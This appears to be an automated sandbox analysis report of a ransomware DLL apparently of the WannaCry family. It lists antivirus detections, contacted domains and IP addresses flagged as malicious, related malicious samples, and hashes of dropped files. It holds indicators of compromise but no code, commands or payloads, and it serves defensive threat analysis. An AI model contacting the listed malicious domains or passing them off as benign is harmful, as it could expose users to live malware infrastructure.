6.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
29.2.tasksche.exe.400000.0.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
6.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
4.0.mssecsvc.exe.7100a4.3.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.4.unpack | 100% | Avira | W32/Virut.Gen
11.0.mssecsvc.exe.400000.0.unpack | 100% | Avira | W32/Virut.Gen
11.2.mssecsvc.exe.7100a4.1.unpack | 100% | Avira | TR/FileCoder.AU
6.0.mssecsvc.exe.400000.6.unpack | 100% | Avira | W32/Virut.Gen
Source | Detection | Scanner | Label
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 12% | Virustotal |
dual-a-0001.a-msedge.net | 0% | Virustotal |
Source | Detection | Scanner | Label
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | 100% | URL Reputation | malware
https://www.bing.c | 0% | Avira URL Cloud | safe
https://ris.a | 0% | Avira URL Cloud | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/x | 100% | Avira URL Cloud | malware
http://pki.goog/repo/certs/gtsr1.der04 | 0% | URL Reputation | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 100% | URL Reputation | malware
https://ris.api8. | 0% | Avira URL Cloud | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/l | 100% | Avira URL Cloud | malware
https://www.bing.cpi/v | 0% | Avira URL Cloud | safe
https://ris.api.iris.micr | 0% | Avira URL Cloud | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | 100% | Avira URL Cloud | malware
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comC | 0% | Avira URL Cloud | safe
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | 0% | URL Reputation | safe
https://store-images.s-micros | 0% | Avira URL Cloud | safe
http://crl.ver) | 0% | Avira URL Cloud | safe
http://crl.pki.goog/gtsr1/gtsr1.crl0W | 0% | URL Reputation | safe
https://pki.goog/repository/0 | 0% | URL Reputation | safe
https://%s.xboxlive.com | 0% | URL Reputation | safe
https://ris.iris.mi | 0% | Avira URL Cloud | safe
https://dynamic.t | 0% | URL Reputation | safe
https://www.kryptoslogic.com | 0% | URL Reputation | safe
https://arc.msn.coP | 0% | Avira URL Cloud | safe
https://%s.dnet.xboxlive.com | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | 104.16.173.80 | true | true | | unknown
dual-a-0001.a-msedge.net | 204.79.197.200 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/ | true | URL Reputation: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe | false | | high
https://www.bing.c | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe | false | | high
https://ris.a | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe | false | | high
http://schema.org/reminderper | backgroundTaskHost.exe | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/x | mssecsvc.exe | true | Avira URL Cloud: malware | unknown
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe | false | | high
http://pki.goog/repo/certs/gtsr1.der04 | lsass.exe | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | mssecsvc.exe | true | URL Reputation: malware | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe | false | | high
https://ris.api8. | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/l | mssecsvc.exe | true | Avira URL Cloud: malware | unknown
https://www.bing.cpi/v | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://ris.api.iris.micr | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
http://www.google.com | svchost.exe | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/22www.iuqerfsodp9ifjaposdfjhgosurijfaewrwer | mssecsvc.exe | true | Avira URL Cloud: malware | unknown
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comC | mssecsvc.exe | true | Avira URL Cloud: safe | unknown
http://www.bingmapsportal.com | svchost.exe | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe | false | | high
http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comJ | mssecsvc.exe | true | URL Reputation: safe | unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe | false | | high
https://store-images.s-micros | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe | false | | high
http://crl.ver) | svchost.exe | false | Avira URL Cloud: safe | low
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe | false | | high
http://crl.pki.goog/gtsr1/gtsr1.crl0W | lsass.exe | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe | false | | high
https://pki.goog/repository/0 | lsass.exe | false | URL Reputation: safe | unknown
https://%s.xboxlive.com | svchost.exe | false | URL Reputation: safe | low
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe | false | | high
https://ris.iris.mi | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r= | svchost.exe | false | | high
https://pf.directory.live.com/profile/profile.asmx | backgroundTaskHost.exe | false | | high
https://dynamic.t | svchost.exe | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Transit | svchost.exe | false | | high
https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen | svchost.exe | false | | high
https://www.kryptoslogic.com | mssecsvc.exe | true | URL Reputation: safe | unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r= | svchost.exe | false | | high
https://activity.windows.com | svchost.exe | false | | high
https://arc.msn.coP | backgroundTaskHost.exe | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Locations | svchost.exe | false | | high
https://%s.dnet.xboxlive.com | svchost.exe | false | URL Reputation: safe | low
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r= | svchost.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.16.173.80 | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | United States | 13335 | CLOUDFLARENETUS | true
104.17.244.81 | unknown | United States | 13335 | CLOUDFLARENETUS | true
                                                                              IP
                                                                              127.0.0.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 670186
Start date and time: 20/07/2022 17:49:48 (2022-07-20 17:49:48 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 15m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: FjYNZSPNkt (renamed file extension from none to dll)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 18
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.troj.evad.winDLL@30/53@2/3
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HDC Information:
                                                                              • Successful, ratio: 29.3% (good quality ratio 26.6%)
                                                                              • Quality average: 77.2%
                                                                              • Quality standard deviation: 32.4%
                                                                              HCA Information:
                                                                              • Successful, ratio: 81%
                                                                              • Number of executed functions: 22
                                                                              • Number of non-executed functions: 99
                                                                              Cookbook Comments:
                                                                              • Adjust boot time
                                                                              • Enable AMSI
                                                                              • Override analysis time to 240s for rundll32
                                                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 20.40.129.122, 23.213.164.66, 20.40.136.238, 20.31.106.135, 20.238.103.94, 8.238.85.126, 67.26.139.254, 67.26.73.254, 8.248.131.254, 8.238.85.254
                                                                              • Excluded domains from analysis (whitelisted): fmghaw.com, wxqeub.com, egzhiu.com, odkwag.com, taseju.com, foefmh.com, fnkuzp.com, oyiqis.com, fs-wildcard.microsoft.com.edgekey.net, halijb.com, pamieb.com, veadit.com, bixitk.com, tarnof.com, eunure.com, uuvznv.com, iigysp.com, wzzoyp.com, www.bing.com, iris-de-prod-azsc-frc-b.francecentral.cloudapp.azure.com, uehixu.com, gveozl.com, ris-prod.trafficmanager.net, nsnpie.com, ouuquq.com, pbswoe.com, ris.api.iris.microsoft.com, imeonl.com, swihwi.com, kvzuyb.com, iegroa.com, zajvof.com, kkujyi.com, ieuydr.com, fg.download.windowsupdate.com.c.footprint.net, evcswy.com, ipffhg.com, dlaiin.com, cjtnlz.com, ryeofz.com, pzrdea.com, iris-de-prod-azsc-weu.westeurope.cloudapp.azure.com, arc.trafficmanager.net, bjnyie.com, prod.fs.microsoft.com.akadns.net, hmogya.com, naciyn.com, juiape.com, oyjapg.com, tqrihq.com, ant.trenz.pl, daufsi.com, fmleqf.com, iuzrbo.com, wu-bg-shim.trafficmanager.net, riwegs.com, kdbimr.com, xnynlv.com, wwflce.com, ryrgex.com, lbhuwa.com, pjyjyp.
                                                                              • Execution Graph export aborted for target tasksche.exe, PID 3908 because there are no executed function
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
17:51:07 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
17:51:31 | API Interceptor | 3x Sleep call for process: svchost.exe modified
Match: 104.16.173.80
Associated Sample Name / URL | Detection | Context
q18L3fXHcX.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
fPFPnWqeow.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
25HrP4nB7z.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
qeoYR80875.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
0AoAuUD0hv.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
GRse5xOyWS.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
1Pf340IWZT.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Cw6bTawfPR.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
lF88TMoBXK.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
EQ6oxEN381.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
vR5qE3L7ow.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
mqGD2k04wg.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
5CzpLpyDvs.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
X3vbdqFLUr.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
V5E1THfAvp.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
TfN4L9J5dc.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
SDpiC5bJDG.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
SRm1E5EfSU.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
n321zWdF9X.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
WF68F77LLw.dll | malicious | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com/
Match: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Associated Sample Name / URL | Detection | Context
q18L3fXHcX.dll | malicious | 104.17.244.81
fPFPnWqeow.dll | malicious | 104.16.173.80
GH3Nse733b.dll | malicious | 104.17.244.81
3zkECrUffH.dll | malicious | 104.17.244.81
25HrP4nB7z.dll | malicious | 104.17.244.81
qeoYR80875.dll | malicious | 104.17.244.81
0AoAuUD0hv.dll | malicious | 104.16.173.80
2RjU5Sgppd.dll | malicious | 104.17.244.81
Jj29gnNYzx.dll | malicious | 104.17.244.81
GRse5xOyWS.dll | malicious | 104.16.173.80
1Pf340IWZT.dll | malicious | 104.17.244.81
Cw6bTawfPR.dll | malicious | 104.17.244.81
lF88TMoBXK.dll | malicious | 104.16.173.80
EQ6oxEN381.dll | malicious | 104.16.173.80
vR5qE3L7ow.dll | malicious | 104.17.244.81
DlxI9O90Df.dll | malicious | 104.17.244.81
45Aq5PJ7wy.dll | malicious | 104.17.244.81
6kocFOY6i7.dll | malicious | 104.16.173.80
mqGD2k04wg.dll | malicious | 104.16.173.80
lpETIMKCTG.dll | malicious | 104.17.244.81
Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
uZqCEvStF9.dll | malicious | 104.29.91.176
Purchase order #44827.docx | malicious | 104.18.183.224
JVjvJDcyo7.dll | malicious | 172.68.168.51
Details5621Opuqhzrxqhaycmmxkaywlkktoonbomxuaj.exe | malicious | 162.159.134.233
fPFPnWqeow.dll | malicious | 104.17.244.81
Purchase order #44827.docx | malicious | 104.18.183.224
GH3Nse733b.dll | malicious | 104.17.244.81
PO-AM2207586.xlsx | malicious | 188.114.96.3
3zkECrUffH.dll | malicious | 104.17.244.81
25HrP4nB7z.dll | malicious | 104.17.244.81
Halkbank_Ekstre_201805002_103141_273160.pdf.exe | malicious | 104.18.115.97
38grJ6wbWq.html | malicious | 104.17.8.210
SecuriteInfo.com.VBA.Logan.3458.3825.xls | malicious | 104.18.182.224
n_message-audio.htm | malicious | 104.17.25.14
SecuriteInfo.com.VBA.Logan.3458.27204.xls | malicious | 104.18.183.224
https://nationalgiveawaypr9.editorx.io/my-site | malicious | 104.17.25.14
SecuriteInfo.com.VBA.Logan.3458.3825.xls | malicious | 104.18.183.224
SecuriteInfo.com.VBA.Logan.3458.27204.xls | malicious | 104.18.183.224
http://tracking.vedupdate.com/tracking/click?d=1k1ihPA66PZCuLWj2723CooG7W1qjCbMOZOaHhQFcoxVzieX6RuPHWcWVjdWtiqrru39deCSQ5gZar-DUza0TNM9U7eEkZG_PvwrPBZZyFuGPyiAlKaWhLJA70sXmkQDSk0f0t_0S__n0XK04eiBxuyCnAEjGo-rhlykrsxPG6M0OIeGNUinOr309LpQGOVu9w2 | malicious | 104.22.24.131
0NoB6NOrRp.exe | malicious | 23.227.38.74
                                                                              No context
                                                                              No context

Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 8192
Entropy (8bit): 0.3593198815979092
Encrypted: false
SSDEEP: 12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
MD5: BF1DC7D5D8DAD7478F426DF8B3F8BAA6
SHA1: C6B0BDE788F553F865D65F773D8F6A3546887E42
SHA-256: BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
SHA-512: 00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: MPEG-4 LOAS
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.2494772344026733
Encrypted: false
SSDEEP: 1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4B:BJiRdwfu2SRU4B
MD5: DEC059FD9745A1CE2C52D3204F8733E1
SHA1: 5A3D91EBDC56D75F80FDAADA1B7C3950080B15CD
SHA-256: 90EA7B989F684CF4EAF221C686C1E17A20C05E7CFD2E3EA6841A5DD99854D19D
SHA-512: DDD20C0D7ECB5BED28BF6979E2AF568134097114FFAB91EE9A3795C68E1BDAD459EEE4EA28598538F0C6A2C38732FAC47137E437A30753AA0EFDF6964EEF9F50
Malicious: false

Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x20b281b8, page size 16384, Windows version 10.0
Category: dropped
Size (bytes): 786432
Entropy (8bit): 0.2507098173884764
Encrypted: false
SSDEEP: 384:A8E8I+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:AfySB2nSB2RSjlK/+mLesOj1J2
MD5: C2792AE423918088E4AFFAC562B38DC6
SHA1: 2C08648EEC0846C9F6607BD18687FF0F43A51787
SHA-256: 82FCFD75558D9C206131E7A1804CE77CE7E5C3D41248CDD707774186D1B58980
SHA-512: C9605F0B9E8AD7BD8B38F946CD93AE1338C9C4D4703C5C725CEFE387D4573DDCFEC8D9A644143B5B87133387EC2AC8645AE03A8FC3C783411D2029638B302324
Malicious: false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):16384
Entropy (8bit):0.07689334245217043
Encrypted:false
SSDEEP:3:dx//J7v6WqcTK/6q8T763lllt/Z7xifk/ill3Vkttlmlnl:dxXJr6WqcTFq8T7yZ7x8h3
MD5:ED28FB6E4A34F02ED0AFD755C9081BBC
SHA1:DC180126C5167BE6F38342FF4620FCD76CE7DBF8
SHA-256:F26DCC3BE1252290BFB34EE4D72A1FA504D69D03A8972CB8020547927919AC1C
SHA-512:91BB8C5EBA5805F4C6A1A0CACEDD482AB2F9736495C9BE0BC0C84C9E7D9D20A6F475E754C252BE87CB4095FE10CFDC076606DC8AB896934049D1FD83C8AE0F69
Malicious:false
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):276
                                                                              Entropy (8bit):3.409048610768343
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQif0cl:ZxMghwLtHSM1Sb9mSMXAvYfl
                                                                              MD5:65F5F3B91636716884C84C1F1D6C466B
                                                                              SHA1:886A03B0AA74D74782020C40F6B770EC440696A4
                                                                              SHA-256:4C71374A89D419BA05CC21234837A2863DD17E68C69C7BF37B3E7F0BFCFA34CB
                                                                              SHA-512:8D1DCC8D7BF82BD21EFDFCC563E80695755F2294E7CDF9FFFF4B9F0BF76A13655327AF32CE2AECF1DEC06DAC24316396AF862A5384BE252B94FD6BD71C61314E
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.W.z.3.4.m.?.v.e.r.=.2.5.1.e...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.422473556620063
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRKaMAo4:ZxMghwLtHSM1Sb9mSMXAvwR/M
                                                                              MD5:053A6748354C63633E9F064D374A3D64
                                                                              SHA1:F7392A988C29192C2DBB9192931C98C346A03B46
                                                                              SHA-256:1867022FBB28FC2A1F79ED84CFA93EFEE48C33EF120A7976E594BD497DA2ED3F
                                                                              SHA-512:175DB5E34D5D66ABCBA2DC76ADF44978A26A70A5CCEA46FF96D3EC85F4F34BA0B571785C3A912E87FD3D194F101339B2D0E988D4A611FFA91F9AC9204BDE5765
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.w.e.j.?.v.e.r.=.c.b.f.0...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4331945997544016
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwR+aLNg:ZxMghwLtHSM1Sb9mSMXAvwR+ai
                                                                              MD5:525B1BA1772CFEE0BAE3DC8B3118E819
                                                                              SHA1:731557E8BA7563E9B04FD45DFE1E97E4B49080DB
                                                                              SHA-256:5A59D990336DC5A357E17ABF1CA3CF5200D212714769BC68EBE01639DB58C215
                                                                              SHA-512:1E86B1BD3E3AFDAB7FA0F57DA80EEF519976B1CDA586D8B90CB87FC247DD26AAACBA5669DE539E9817A7505DFB1BEE2457567A4909D36841F39CDD5D7ED7752E
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.X.J.7.Z.?.v.e.r.=.1.3.f.a...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.3894363370336076
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRct:ZxMghwLtHSM1Sb9mSMXAvwR
                                                                              MD5:A27F678F172C642E24DE4740C5B2DBC3
                                                                              SHA1:36444729D96B371E3B182455FD5416A724875FF3
                                                                              SHA-256:BF27499FEA1EC1D167352764D5DE5CC87FCE82683C3F8CDB3E3A19086DEC5C82
                                                                              SHA-512:7846A476F6349EB719D781B6F529DCAAB21140067A54756A3C51E695B20E4C5FF74F5CA798181023D22860E9EA36C9E452EC003AB8A1B242033EB43F3EFA627F
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.l.T.B.?.v.e.r.=.2.a.9.4...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.422473556620063
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRKaMAo4:ZxMghwLtHSM1Sb9mSMXAvwR/M
                                                                              MD5:053A6748354C63633E9F064D374A3D64
                                                                              SHA1:F7392A988C29192C2DBB9192931C98C346A03B46
                                                                              SHA-256:1867022FBB28FC2A1F79ED84CFA93EFEE48C33EF120A7976E594BD497DA2ED3F
                                                                              SHA-512:175DB5E34D5D66ABCBA2DC76ADF44978A26A70A5CCEA46FF96D3EC85F4F34BA0B571785C3A912E87FD3D194F101339B2D0E988D4A611FFA91F9AC9204BDE5765
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.P.w.e.j.?.v.e.r.=.c.b.f.0...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4065402489118934
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRyjMr/J:ZxMghwLtHSM1Sb9mSMXAvwRyw
                                                                              MD5:0804BAA6AA2E6F3BFEE26C4878964D8F
                                                                              SHA1:364E417682227335558E0FC681CA63AAAB6EF547
                                                                              SHA-256:32A17854D220D2ADEF855727933DD22470E0A020E20CFC6A3EADA1DB587101E4
                                                                              SHA-512:7F774750853454E087B922329D4C8FD3E7B3FC75FF9D878AF3A0312F14B3F857AD8DC5EF71837BC5CAAC383DB3AF7051E6995697613F1039FA09380289B633C7
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.W.N.R.4.?.v.e.r.=.8.2.a.7...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.391792531393513
                                                                              Encrypted:false
                                                                              SSDEEP:6:ZyncUkamOwhg2YMYtHSMLhU7lBSliHGSMX6YXKMwEQwRCAo1q1:ZxMghwLtHSM1Sb9mSMXAvwRC9+
                                                                              MD5:243F925C0ABBE732E09B0C2E29A638FD
                                                                              SHA1:FDB0600BA877727571437801BAF1B269E1591267
                                                                              SHA-256:E6EA053E76B0AAEA7FC55F05636DAD3C092C25C5730465655F0ED232B5D2AECC
                                                                              SHA-512:F24E9CF872FED828C9840D0A5D3905B83F30B6715556D55EE9F7294BBB04373EDFED7C9FCE91EBD277287B0198C47B50CF8B68A83420FC44D036E291821EFC65
                                                                              Malicious:false
                                                                              Preview:F.4.2.0.C.4.E.A.-.4.2.6.1.-.4.B.6.6.-.8.B.9.C.-.E.A.A.8.C.C.C.9.6.A.D.E...G.E.T...h.t.t.p.s.:././.i.m.g.-.p.r.o.d.-.c.m.s.-.r.t.-.m.i.c.r.o.s.o.f.t.-.c.o.m...a.k.a.m.a.i.z.e.d...n.e.t./.c.m.s./.a.p.i./.a.m./.i.m.a.g.e.F.i.l.e.D.a.t.a./.R.E.4.F.w.5.F.?.v.e.r.=.6.f.6.a...........
                                                                              Process:C:\Windows\System32\backgroundTaskHost.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):278
                                                                              Entropy (8bit):3.4179947346853985
                                                                              Encrypted:false
